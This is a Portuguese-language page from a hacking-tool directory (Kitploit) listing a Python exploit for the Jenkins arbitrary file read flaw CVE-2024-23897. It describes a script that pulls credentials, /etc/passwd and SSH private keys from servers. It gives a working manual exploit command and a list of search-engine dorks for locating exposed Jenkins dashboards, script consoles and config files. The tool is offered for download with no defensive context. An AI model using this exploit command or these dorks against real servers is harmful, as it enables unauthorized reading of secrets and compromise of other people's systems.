Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
Ferramentas/GitHubGitHub/pulentoski/cve-2024-23897-arbitrary-file-read
ReconhecimentoAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebColeta de InformaçõesTestes de Penetração
GitHubpulentoski/cve-2024-23897-arbitrary-file-read

CVE-2024-23897-Arbitrary-file-read

Um script feito em python para automatizar a vulnerabilidade CVE-2024-23897

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Ver Repositório
há 1 anoAinda não revisado
Compartilhar

🤵🏻 CVE-2024-23897 Leitura-arbitrária-de-arquivo 🤵🏻


Versões afetadas:

  • Jenkins 2.441 e anteriores.
  • Jenkins LTS 2.426.2 e anteriores.

Um script em Python para automatizar a vulnerabilidade CVE-2024-23897 🤖 🛠️

Este código Python apresenta um scanner para uma vulnerabilidade específica (CVE-2024-23897) em servidores Jenkins. Começa solicitando ao usuário a URL do servidor Jenkins.

Em seguida, oferece a opção de baixar o arquivo "jenkins-cli.jar" necessário para interagir com Jenkins a partir da linha de comando. Depois, apresenta um menu de opções que inclui executar comandos como obter informações do servidor, do ambiente, de configuração do Jenkins, de usuários, de credenciais, bem como realizar leituras de arquivos sensíveis como "/etc/passwd", "/etc/os-release" e "id_rsa".

Uma vez selecionada uma opção do menu, o comando correspondente é executado no servidor Jenkins fornecido. O código está estruturado com funções para baixar o arquivo e executar os comandos, e uma função principal para gerenciar o fluxo do programa.

Execução para servidor Jenkins 📝:

root@kitploit:~
python3 CVE-2024-23897-A-scaner.py 

execução para servidor Jenkins EM DOCKER 📝:

root@kitploit:~
python3  CVE-2024-23897-B-DOCKER-scaner.py
---------------------------------------------------------------------------------------------------------------------------------

execução manual.

1- baixar jenkins-cli.jar : http:///jnlpJars/jenkins-cli.jar

2- para realizar LFI, executar: java -jar jenkins-cli.jar -s http://172.17.0.2:8080/ -http connect-node "@/etc/passwd"


lista de dorks:

intitle:"Dashboard [Jenkins]" inurl:"/login"

intitle:"Jenkins" "Dashboard"

inurl:"/computer/" intitle:"Jenkins"

inurl:"/script" intitle:"Jenkins"

"Jenkins [Jenkins]" intitle:"Login"

intitle:"Jenkins" "Jenkins ver. 2.441"

inurl:"/manage" intitle:"Jenkins"

site:.com intitle:"Jenkins"

site:aws.amazon.com intitle:"Jenkins"

filetype:xml inurl:"jenkins/config.xml"

Baixar ferramenta